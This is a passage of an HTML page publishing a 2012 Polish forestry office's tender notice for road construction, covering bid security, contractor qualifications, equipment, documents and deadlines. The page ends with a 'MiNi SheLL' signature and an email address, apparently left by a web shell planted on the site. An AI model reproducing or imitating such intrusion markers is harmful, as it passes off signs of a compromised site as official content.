2)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy,
3)	niezwłocznie, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający zatrzymuje wadium wraz z odsetkami (art. 46 ust. 4a i 5 Ustawy), jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.

Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 12.7.1), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wraz z ofertą Wykonawca złoży oświadczenie posiadania uprawnień do wykonywania działalności stanowiącej przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony (niezależnie od liczby części których wykonanie oferuje wykonawca), jeżeli wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał zgodnie z zasadami sztuki technicznej i prawidłowo ukończył co najmniej dwie roboty budowlane w zakresie budowy lub przebudowy lub remontu dróg o wartości nie niższej niż 2 000 000,00 zł.  netto każda (za ukończone roboty będzie rozumiało się takie, w stosunku do których zostało wystawione Świadectwo Przejęcia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym: Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a) dla części 1  co najmniej: 
- sam. ciężarowy samowyładowczy o ład. min. 10 ton - 4 szt.,  koparki o poj. łyżki 0,4m3 - 2 szt., walec stalowo - gumowy 12 ton - 2 szt.,  walec stalowy 15 ton - 2 szt.,  walec stalowy lekki wibracyjny  - 2 szt., walec ogumiony - 1 szt., zagęszczarki płytowe - 3 szt., równiarka - 1 szt.,  rozściełacz do mieszanek mineralno - asfaltowych - 1 szt., szczotka mechaniczna - 1 szt., skrapiarka lepiszcza - 1 szt.
b) dla części 2  co najmniej: 
- sam. ciężarowy samowyładowczy o ład. min. 10 ton - 4 szt.,  koparki o poj. łyżki 0,4m3 - 2 szt., walec stalowo - gumowy 12 ton - 3 szt.,  walec stalowy 15 ton - 3 szt.,  walec stalowy lekki wibracyjny - 2 szt., walec ogumiony - 1 szt.,  zagęszczarki płytowe - 3 szt., równiarka - 1 szt.,  rozściełacz do mieszanek mineralno - asfaltowych - 1 szt., szczotka mechaniczna - 1 szt., skrapiarka lepiszcza - 1 szt.
c) dla części 3  co najmniej: 
- sam. ciężarowy samowyładowczy o ład. min. 10 ton - 6 szt.,  koparki o poj. łyżki 0,4m3 - 3 szt., walec stalowo - gumowy 12 ton - 3 szt.,  walec stalowy 15 ton - 3 szt.,  walec stalowy lekki - 2 szt., walec ogumiony - 1 szt.,  zagęszczarki płytowe - 3 szt., równiarka - 1 szt.,  rozściełacz do mieszanek mineralno - asfaltowych - 1 szt., skrapiarka lepiszcza - 1 szt., rozsypywarka kruszywa - 1 szt., szczotka mechaniczna - 1 szt.

W wykazie sprzętu należy zamieścić informację o sposobie dysponowania tymi zasobami.
W przypadku gdy powyższa ilość sprzętu okaże się niewystarczająca, Wykonawcy zobowiązani są do  zaangażowania większych zasobów kadrowo - sprzętowych, które zapewnią ukończenie robót w terminie umownym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w zakresie dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony (niezależnie od liczby części których wykonanie oferuje wykonawca), jeżeli wykonawca wykaże, że dysponuje co najmniej: jednym kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej z ograniczeniami, określone przepisami ustawy Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) lub odpowiadające im uprawnienia budowlane. W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394).
Podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego, oraz - zgodnie z ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5, poz. 42, ze zm.) - wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności.

Ilość robotników niezbędną do prawidłowej i terminowej  realizacji robót Wykonawca dobierze wedle uznania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż:
-	dla części 1: 900 000,00 zł. (słownie: dziewięćset tysięcy złotych),
-	dla części 2: 900 000,00 zł. (słownie: dziewięćset tysięcy złotych), 
-	dla części 3: 1 000 000,00 zł. (słownie: jeden milion złotych).
2) jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia - na kwotę co najmniej:
-	dla części 1: 900 000,00 zł. (słownie: dziewięćset tysięcy złotych),
-	dla części 2: 900 000,00 zł. (słownie: dziewięćset tysięcy złotych), 
-	dla części 3: 1 000 000,00 zł. (słownie: jeden milion złotych).
W przypadku realizacji więcej niż jednej części zamówienia powyższe kwoty odpowiednio sumują się.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach. Na podstawie art. 144 ust. 1 ustawy PZP dopuszcza się zmianę zawartej umowy pomiędzy Wykonawcą a Zamawiającym w stosunku do treści oferty z zastosowaniem:
-	zmiany terminu wykonania prac - termin wykonania prac może ulec zmianie w następujących okolicznościach:
-	przeszkód wynikających z organów administracyjnych w zakresie nadzoru, oraz warunków wykonywania przedmiotu umowy,
-	wystąpieniem warunków pogodowych mających wpływ na brak możliwości prowadzenia robót budowlanych tj.: długotrwałe intensywne opady trwające powyżej 9 dni, powódź powodująca konieczność przerwania robót na czas niezbędny na osuszenie zalanego terenu do momentu, w którym możliwa jest kontynuacja lub rozpoczęcie robót, itp.;
-	okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy, takich jak: siła wyższa, kolizje transportowe lub komunikacyjne itp. - powodujące zniszczenia lub uszkodzenia wymagające naprawy, a także związane z odkryciem w gruncie przedmiotów niemożliwych wcześniej do zidentyfikowania takich jak: głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_sieniawa/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający:
Nadleśnictwo Sieniawa
ul. Kościuszki 11
37-530 Sieniawa

Inwestor Zastępczy:
NADROMAR Jan Marszałek
ul. Malczewskiego 7/29
35-114 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Nadleśnictwo Sieniawa, ul. Kościuszki 11, 37-530 Sieniawa, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com